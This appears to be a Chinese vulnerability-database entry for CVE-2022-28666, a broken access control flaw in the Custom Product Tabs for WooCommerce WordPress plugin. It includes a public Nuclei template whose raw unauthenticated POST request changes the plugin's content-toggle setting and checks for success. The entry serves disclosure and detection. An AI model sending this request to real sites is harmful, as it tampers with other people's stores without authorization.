漏洞描述
YIKES Inc. Custom Product Tabs for WooCommerce plugin \u003C= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
CVE-2022-28666: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
PoC代码[已公开]
id: CVE-2022-28666
info:
name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
author: Sourabh-Sahu
severity: medium
description: |
YIKES Inc. Custom Product Tabs for WooCommerce plugin \u003C= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
impact: |
Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
remediation: |
Update to the latest version of the plugin, above 1.7.7.
reference:
- https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-28666
epss-score: 0.20653
epss-percentile: 0.95383
cwe-id: CWE-287
cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce::::::wordpress::*
metadata:
verified: true
max-request: 1
publicwww-query: "yikes-inc-easy-custom"
tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive
http:
- raw:
- |
POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
toggle_the_content=false
matchers:
- type: dsl
dsl:
- "contains_all(body, 'success','Settings updated')"
- "contains(content_type, 'application/json')"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100f5e56599b5b3c492e2e1ccaef9513031657d9b78232ad92be26c71341639454b022100e3625653d68dddb1c7b0c61552c093898fbbcf1adb958c7d141209c89f63ecc4:922c64590222798bb761d5b6d8e72950